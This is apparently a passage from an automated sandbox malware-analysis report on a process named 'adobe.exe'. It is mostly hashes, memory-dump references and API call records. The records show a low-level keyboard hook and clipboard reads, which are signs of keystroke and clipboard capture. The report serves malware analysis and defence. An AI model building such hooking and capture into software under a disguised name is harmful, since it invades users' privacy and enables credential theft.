Instruction Fuzzy Hash: B92183755093808FC712CF24D594715BF71EB46314F28C5EBD8498F6A7C33A980ACB62

Function 00FCD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1887742805.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fcd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 42e924271af87e70bede3bc7a861002bd56165e2d8aae147d7fc277a08c58675
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2A110372804240DFCB06CF00DAC4B1ABF71FB94324F24C2ADD9090B256C33AE85ADBA1

Analysis Process: adobe.exePID: 7320, Parent PID: 7292COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.4%
Total number of Nodes:	219
Total number of Limit Nodes:	25

Executed Functions

Function 06E32750 Relevance: 9.0, Strings: 6, Instructions: 1479COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E33B64
$^q, xrefs: 06E33B23
$^q, xrefs: 06E33B40
$^q, xrefs: 06E33B70
$^q, xrefs: 06E33B17
$^q, xrefs: 06E33B4C

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 7c8b427d08a326a05e433a3e1225936a9448b10c7596a8255aac142ea7211854
Instruction ID: 241b24ddcecc2d076a04d109631eb175e8a6b309a906bdf175d60e776e6a1b52
Opcode Fuzzy Hash: 7c8b427d08a326a05e433a3e1225936a9448b10c7596a8255aac142ea7211854
Instruction Fuzzy Hash: 3FD26734E003198FDB64DF68C588A9DB7B2FF89314F54D5A9D449AB264EB30ED85CB80

Function 06E3B1A8 Relevance: 8.3, Strings: 6, Instructions: 767COMMON

Download Yara Rule

Strings

$^q, xrefs: 06E3BB1F
$^q, xrefs: 06E3BAEB
$^q, xrefs: 06E3BAF7
$^q, xrefs: 06E3BB2B
$^q, xrefs: 06E3BB5F
$^q, xrefs: 06E3BB53

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 46110d0d52a4649053cfab12ca1bfc2ce72b00964449a3cdac16073a6593c1a7
Instruction ID: 4c215b167915afb3d257281f9df4af27ba19474e36e9c8759a3a7127469c2b2d
Opcode Fuzzy Hash: 46110d0d52a4649053cfab12ca1bfc2ce72b00964449a3cdac16073a6593c1a7
Instruction Fuzzy Hash: C0529F30E103198FEF64CB68C5987AEB7B2FB95314F209926D40ADB395DA35DC81CB91

Function 06E37CF8 Relevance: 3.0, Strings: 2, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06E38041
$^q, xrefs: 06E38035

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: b9cad66a9fa8dce51614bf85d77fd7eeb74a32536c22fd5b9086b9c61b600049
Instruction ID: 3bf6d48cea2d8c20f66d17cedd88a2a741f9463c622e3c69c4463f390565ea8e
Opcode Fuzzy Hash: b9cad66a9fa8dce51614bf85d77fd7eeb74a32536c22fd5b9086b9c61b600049
Instruction Fuzzy Hash: AD02BF34B002299FDF54DB68D5986AEB7E2FF84304F248569E405DB394EB35EC86CB81

Function 06E29AE8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06E2A130,00000000,00000000), ref: 06E2A343

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 14ee218dc8a7023a3dd7085b4bd93e45864c85d18072fa22652b92a02981268a
Instruction ID: 62c5bd3309eb4eeba08c95aae514b59fb2d518042db1be369baaff092d41b513
Opcode Fuzzy Hash: 14ee218dc8a7023a3dd7085b4bd93e45864c85d18072fa22652b92a02981268a
Instruction Fuzzy Hash: E82137B1D04219CFCB54DF99C844BEEBBF5BB88310F148429E458A7250C775A940CFA1

Function 06E36560 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92b339c4bfc27f1157d9a2ecdd2df45271d16abf1c26298ef209c90021bf264a
Instruction ID: f88097de5253b744abb02afb48d7b2e2ddf320387efaf5001d69c98a146cc26c
Opcode Fuzzy Hash: 92b339c4bfc27f1157d9a2ecdd2df45271d16abf1c26298ef209c90021bf264a
Instruction Fuzzy Hash: B3629F34A00324AFDB54DB78D598AADB7F2EF88318F249469E405DB394DB35EC46CB90

Function 06E3C0F8 Relevance: .6, Instructions: 639COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 493a790ba99d5f81e973631f91f1084890a222e3cc70f0e819a1a463d4449593
Instruction ID: 2bda59b1913cd088cf11fb279f125caf6e1bb482a5bd4fb01da67e75cb522779
Opcode Fuzzy Hash: 493a790ba99d5f81e973631f91f1084890a222e3cc70f0e819a1a463d4449593
Instruction Fuzzy Hash: 4B32BE34B102199FDF54DB68D984BAEBBB6FB88714F209525E405EB390DB35EC42CB81

Function 06E35550 Relevance: .6, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0073ae0cb9ebd923dd4d478ac2a5bf9fb02f85c81b26e807b090fa328a737963
Instruction ID: 7b1811783c6441bb3ad4d907dc1f7de8ff1d02f64b255e490e1626c01218f72d
Opcode Fuzzy Hash: 0073ae0cb9ebd923dd4d478ac2a5bf9fb02f85c81b26e807b090fa328a737963
Instruction Fuzzy Hash: 7412E335F103249BDB64DF64C8887AEB7B2EB85318F208879D859DB385DA34EC45CB91

Function 06E3AC40 Relevance: 10.4, Strings: 8, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06E3ADE3
$^q, xrefs: 06E3ADB4
$^q, xrefs: 06E3AE18
$^q, xrefs: 06E3AD61
$^q, xrefs: 06E3AD6D
$^q, xrefs: 06E3ADEF
$^q, xrefs: 06E3AE0C
$^q, xrefs: 06E3ADC0

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: e48434dda941324bf2aec7844431c4d101281882d838e75f0f2e2984fa499776
Instruction ID: 8d60ea384fd0fe58457a5acd46691e5f735f8ed3bc2c88242c35a9f3368f698e
Opcode Fuzzy Hash: e48434dda941324bf2aec7844431c4d101281882d838e75f0f2e2984fa499776
Instruction Fuzzy Hash: E5E18C30E103198FDB69DF69D5846AEB7B2FB88304F209529D4469B354DB35DC86CB81

Function 06E390C8 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06E3910F
$^q, xrefs: 06E39156
$^q, xrefs: 06E3911B
$^q, xrefs: 06E3914A

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 809c1fe7404f6f37d2e488f363406a18e3d1fb8174f66b7d39b1943b2d41edf6
Instruction ID: 45c0c359c16042d1ee6bd12d994e0c12b628f0af7e8d269873a2673c82716807
Opcode Fuzzy Hash: 809c1fe7404f6f37d2e488f363406a18e3d1fb8174f66b7d39b1943b2d41edf6
Instruction Fuzzy Hash: 24914A34B0021A9FEB54DB65D9947AEB3F6BBC8204F108569C809EB385EB749C46CB91

Function 06E3CEC8 Relevance: 4.5, Strings: 3, Instructions: 798
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06E3D2D3
$^q, xrefs: 06E3D2BF
$^q, xrefs: 06E3D2C7

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 01e89f04d46daecf62da236066bc8b0472e674ba16872542cd4644965723a984
Instruction ID: cf4af45f9398d20f1ccba1c8674485285eabee8b815a2eeedd6b8071e8013597
Opcode Fuzzy Hash: 01e89f04d46daecf62da236066bc8b0472e674ba16872542cd4644965723a984
Instruction Fuzzy Hash: 1B625F34A0131A8FCB15DF69D994A9DB7B6FF84304F209A68D0099F395DB75EC4ACB80

Function 06E34B18 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06E34C45
fcq, xrefs: 06E35225
\Ocq, xrefs: 06E34CCF

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: e3ba77dacc043ac5882e5e96319b1fa227e938ec0380cc1c41f956d7c188b599
Instruction ID: 79ddd73946b666dc50092805b29e768613805918f0cf870dcf64e529ccd248f6
Opcode Fuzzy Hash: e3ba77dacc043ac5882e5e96319b1fa227e938ec0380cc1c41f956d7c188b599
Instruction Fuzzy Hash: 38617C34F003189FEB55DFA5C8587AEBAF6EB88300F208429D149AB395DF758C45CB91

Function 06E390B9 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06E3910F
$^q, xrefs: 06E3914A

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: cbb82a634ca4e41cd4df0ca1b7667ffb410449181388cdbc2edcc1a37e9d82a8
Instruction ID: 457c2d72b3ad80f78101f09d833644078b989784c3651d58b3121ab7f5027558
Opcode Fuzzy Hash: cbb82a634ca4e41cd4df0ca1b7667ffb410449181388cdbc2edcc1a37e9d82a8
Instruction Fuzzy Hash: B9515C34B002159FEB54DB75D994BAEB3FAFBC8644F108569C809EB384EB749C42CB91

Function 06E22DE1 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ee9d415baec934c66e7ad77fc4767eed75aff7553a1e8033824eb32984a7c1
Instruction ID: 36b7eb12f0de475aa1ad1f516b639054193adae0b50e354e3070087faa180f11
Opcode Fuzzy Hash: a7ee9d415baec934c66e7ad77fc4767eed75aff7553a1e8033824eb32984a7c1
Instruction Fuzzy Hash: C5716770C0035AEFDF12CFA8D8809DEBFB2AF89304F14916AE518AB220D7319945DF91

Function 031EED40 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.4105732081.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_31e0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd9f57a97362a324a9019559e3be85e885f272962503c43f05c24b178134142
Instruction ID: 5c11ddeaa41f6b894d98caf90678bba91b8c3eb1e8a400bd5e4c9f3ebf12a10a
Opcode Fuzzy Hash: efd9f57a97362a324a9019559e3be85e885f272962503c43f05c24b178134142
Instruction Fuzzy Hash: 30411272D047998FC714DFB9D80429EBFF5EF89210F1885AAD444A7241DB349845CBE1

Function 06E22E58 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E22F6A

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1f680421af63e2390323e055d796e922339a4d8d6c172a374ef830aefd45a777
Instruction ID: fd5c509db3278dbc5b85cfcdd56b26dd71bcc90564b994ca8cd60b46bd321d65
Opcode Fuzzy Hash: 1f680421af63e2390323e055d796e922339a4d8d6c172a374ef830aefd45a777
Instruction Fuzzy Hash: 8D41C0B1D00319DFDB14CFA9C884ADEFBB6BF48314F24852AE419AB210D7719985CF91

Function 06E26694 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06E279E9

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a074850e20a1da67c9e5eabacf6020f4c235a662b08e105ebf485f66f7646bf8
Instruction ID: 16e52ff596c0ff722644542f00a5dec5d566f05783305fd9ad2d3b3ec5787234
Opcode Fuzzy Hash: a074850e20a1da67c9e5eabacf6020f4c235a662b08e105ebf485f66f7646bf8
Instruction Fuzzy Hash: A44149B490031ACFDB54CF59C488AAABBF6FF88314F24C459D519AB320D774A941CFA0

Function 06E2866C Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06E28700

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 76b1ec2f248017135c4d9328301d4aa6f552b957552602723bcd85ed3be58c7d
Instruction ID: 2e5bb9ad2b9c78d556c79e5c5ac21b6dba57cd0944e6173034f7f86bfb7cf8b9
Opcode Fuzzy Hash: 76b1ec2f248017135c4d9328301d4aa6f552b957552602723bcd85ed3be58c7d
Instruction Fuzzy Hash: EE3122B4E01359DFDB10CFA9C984BCEBBF6AF48304F248059E408AB294DBB55949CF95

Function 06E280A8 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06E28700

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 17175836f355899fde8bea701716693d935ce2118703c1cfe3ec4bd4cdb14c17
Instruction ID: 2a6ad28a90da482fe33da36a0975b7786c0f69dabd7a038ccbf3ccb8b5604cbb
Opcode Fuzzy Hash: 17175836f355899fde8bea701716693d935ce2118703c1cfe3ec4bd4cdb14c17
Instruction Fuzzy Hash: E43101B0E01319DFDB50CFA9C984BDEBBF5AB48304F248059E404AB290D7B5A949CF95

Function 06E21D45 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06E21E16

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 25aec2ee7e1e2629cbc646b988690d42238bbd2d86c7752d42e9395f30c63057
Instruction ID: 9fff35e04f5e877ea203cca688ca43463fb6d0e7f8f47a80e45bf31ad241f1c9
Opcode Fuzzy Hash: 25aec2ee7e1e2629cbc646b988690d42238bbd2d86c7752d42e9395f30c63057
Instruction Fuzzy Hash: 972178B5D00359CFCB14CFAAC8446DEBFF2EF89214F10846AC459AB250C774A945CFA5

Function 06E26A90 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E26B1F

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9c683e74864d85d61d01991b5ddab5f2f0c7c0101110eac98e665f04ce7533da
Instruction ID: 713832c5fdc6ede3c8f6ff7a9271d11b01dc93a74b7614b270c8825e9e06dea5
Opcode Fuzzy Hash: 9c683e74864d85d61d01991b5ddab5f2f0c7c0101110eac98e665f04ce7533da
Instruction Fuzzy Hash: 982116B5900359DFDB10CFA9D884ADEBFF9EB48310F14801AE954A3310D774A940CFA1

Function 06E26A98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06E26B1F

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bd25fab074c5b7defb3b68e2c468c4f98ee3b7df81833d04fd813a1807429d8e
Instruction ID: 05bb3dff21a7dd34d0cb1bd4ba112b418fbca06b3dd0087f38668c7e70e0229b
Opcode Fuzzy Hash: bd25fab074c5b7defb3b68e2c468c4f98ee3b7df81833d04fd813a1807429d8e
Instruction Fuzzy Hash: BC21E2B5900219DFDB10CFAAD984ADEBFF9EB48320F14841AE918A7310D374A940CFA5

Function 06E2A2C0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06E2A130,00000000,00000000), ref: 06E2A343

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: a41e69175dd19b079d41e94b88b234788f3cfc6a6fdcca3f7ef2576f0b5ecfbb
Instruction ID: 75b9fe33fa85fc1b6ab25bdd25137ba38bd3354e71b7b5423793f007416c19fc
Opcode Fuzzy Hash: a41e69175dd19b079d41e94b88b234788f3cfc6a6fdcca3f7ef2576f0b5ecfbb
Instruction Fuzzy Hash: F92138B1D04219DFCB14CF99C844BDEFBF5BB88320F148429E419A7250CB75A944CFA1

Function 031EEE10 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,5505E7BA), ref: 031EEE7F

Memory Dump Source

Source File: 0000000A.00000002.4105732081.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_31e0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 8051e5be6918d4b7d74ea6e2615301dba1de996e6191a00b4890e1f3155a03fd
Instruction ID: 165ff0977cc1779c0f9c1c15d554273a2aff27cdb97f1092d7706ccd2e3f3687
Opcode Fuzzy Hash: 8051e5be6918d4b7d74ea6e2615301dba1de996e6191a00b4890e1f3155a03fd
Instruction Fuzzy Hash: 9B1100B1C006699BCB10DFAAC544BDEFBF4EF48320F14816AD858A7241D379A954CFA5

Function 06E2039C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06E21E16

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3f57b5314922f937e86a8ad4749ac9b194bfaae05813c36d671aa4220b3a9762
Instruction ID: 9b8be4dfa38edddf76653a6ca9461849bb68189bffabd766e4a9ae37d10503b0
Opcode Fuzzy Hash: 3f57b5314922f937e86a8ad4749ac9b194bfaae05813c36d671aa4220b3a9762
Instruction Fuzzy Hash: E411EFB5C00359CFCB10DF9AC844ADEBBF5EB48214F10842AD969A7610D375A645CFA5

Function 06E21DAB Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06E21E16

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2b4ec54bb11ce02fe65d0643b8156ae45a4477e8e9f7f87aacb13cd43890f7b8
Instruction ID: 048a3bac7122138ff96a23add89e9fb1b418dde96bfb189fae4731c3491e520d
Opcode Fuzzy Hash: 2b4ec54bb11ce02fe65d0643b8156ae45a4477e8e9f7f87aacb13cd43890f7b8
Instruction Fuzzy Hash: 8B1102B5C00359CFCB10CF9AC844ADEFBF5AF48214F10842AD569B7610C375A645CFA1

Function 06E266EC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06E27C35), ref: 06E27CBF

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 26adee4d567ca0d7e9e649e66391e200b6d5f3455e613a36d57ade9eb577df7a
Instruction ID: c9e825f3e86d93a0bc5a0cfe5671342da4c5f6e210b24dd4aef236e5eb07a5e1
Opcode Fuzzy Hash: 26adee4d567ca0d7e9e649e66391e200b6d5f3455e613a36d57ade9eb577df7a
Instruction Fuzzy Hash: 4A1133B1804359CFCB10DFAAD885BDEBBF8EB48324F208419D559A7300C374A940CFA5

Function 06E28529 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E28585

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5e4d4a449632516ef421ddddc654b001d4a99bbf57d52f55c2b35b18405b5054
Instruction ID: 2de61f2d1b8e1aa2892e6437c8d3f36cc0b3a93c338ba511e01049a0fe817064
Opcode Fuzzy Hash: 5e4d4a449632516ef421ddddc654b001d4a99bbf57d52f55c2b35b18405b5054
Instruction Fuzzy Hash: A51142B4800358CFCB20CFA9D444BDEBFF5AB88324F24841AE119A7210C375A984CFA1

Function 06E26834 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E28585

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3aa5923cf13539c94361cd5e174156c38878cebad8061982a3ebef2552913851
Instruction ID: 99c57ce496c0b65d4f71764f112f8d3ed9edd460c41e26ea0a76cc98d9b5b4fe
Opcode Fuzzy Hash: 3aa5923cf13539c94361cd5e174156c38878cebad8061982a3ebef2552913851
Instruction Fuzzy Hash: C31145B0800359CFCB20DF9AD448BDEBBF4EB48324F108459D519A7210D378A944CFA5

Function 06E27C58 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06E27C35), ref: 06E27CBF

Memory Dump Source

Source File: 0000000A.00000002.4117650673.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e20000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 923ad65da0e8803f40d1ea59a3000940720867a9d069d13288fcc9c5319e88aa
Instruction ID: 31ee9583c1e006ea505a995b20de3cc3d585d4a470801386731c911c7e26d822
Opcode Fuzzy Hash: 923ad65da0e8803f40d1ea59a3000940720867a9d069d13288fcc9c5319e88aa
Instruction Fuzzy Hash: 511130B1800259CFCB20CFAAD845BDEBFF8AB48324F20841AD558B7300D774A940CFA5

Function 06E34B09 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

XPcq, xrefs: 06E34C45

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e30000_adobe.jbxd

Similarity

API ID:
String ID: XPcq
API String ID: 0-714321711
Opcode ID: 21f7fed0a52b959ea1166be09fa4cbf07a25c255323d314be2732d67e36c782a
Instruction ID: a4a4728f1ba276e9bab6431a3c92eea415eb62a16b7808f013a273b5bb275a8d
Opcode Fuzzy Hash: 21f7fed0a52b959ea1166be09fa4cbf07a25c255323d314be2732d67e36c782a
Instruction Fuzzy Hash: 86418C34F102189FEB55DFA5C854BAEBBF6EF88700F208529E145AB3D5DB748C058B91

Function 06E3DA50 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06E3DB99

Memory Dump Source

Source File: 0000000A.00000002.4117741284.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false

